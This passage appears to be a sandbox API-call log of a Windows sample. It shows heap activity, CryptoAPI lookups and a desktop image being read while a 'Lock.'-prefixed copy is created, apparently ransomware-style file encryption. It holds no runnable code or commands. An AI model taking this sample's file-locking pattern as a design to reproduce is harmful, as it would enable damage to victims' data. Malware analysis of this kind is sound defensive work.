[0163.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0163.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0163.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0163.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0163.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0163.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0163.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0163.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0163.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0163.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0163.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0163.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0163.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0163.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0163.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0163.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0163.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0163.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0163.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0163.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0163.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0163.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466df0 [0163.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466df0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0163.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0163.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0163.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0163.793] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0163.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0163.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0163.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0163.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0163.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0163.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0163.793] CryptDestroyHash (hHash=0xaa5660) returned 1 [0163.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0163.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0163.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0163.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0163.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0163.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0163.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0163.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0163.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0163.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0163.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0163.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0163.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0163.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0163.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0163.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0163.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0163.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0163.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0163.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0163.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0163.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0163.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0163.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0163.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0163.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0163.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0163.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0163.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0163.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0163.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0163.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0163.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0163.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0163.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0163.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0163.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0163.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0163.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0163.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0163.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0163.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0163.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0163.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0163.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0163.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0163.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0163.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0163.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0163.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0163.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0163.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0163.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0163.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0163.796] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0163.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0163.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0163.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0163.796] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0163.796] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.796] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.796] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0163.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0163.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0163.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0163.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0163.797] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/DrmlVcs.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\drmlvcs.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0163.797] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.797] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0163.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0163.797] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0163.797] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.797] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0163.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0163.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0163.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0163.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0163.798] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.DrmlVcs.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.drmlvcs.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0164.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0164.301] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0164.301] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.301] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0164.301] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0164.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0164.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0164.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.301] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0164.301] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0164.302] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x59aa, lpOverlapped=0x0) returned 1 [0164.303] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0164.304] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0164.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0164.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0164.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0164.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x159aa) returned 0x24d7a58 [0164.305] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0164.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0164.305] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0164.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0164.305] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0164.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0164.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0164.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0164.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1948 [0164.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0164.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0164.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0164.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0164.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x159aa) returned 0x24d7a58 [0164.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0164.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16f8 [0164.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0164.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2658 [0164.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0164.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0164.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0164.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c48 [0164.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0164.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0164.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0164.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0164.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0164.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0164.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0164.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0164.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0164.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0164.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0164.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x159aa) returned 0x34c7c08 [0164.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0164.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0164.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0164.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0164.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0164.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0164.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0164.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0164.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0164.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0164.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0164.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0164.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0164.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0164.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0164.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0164.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0164.308] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0164.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0164.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0164.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0164.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0164.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0164.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0164.308] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0164.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0164.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0164.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0164.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0164.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0164.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0164.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0164.308] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 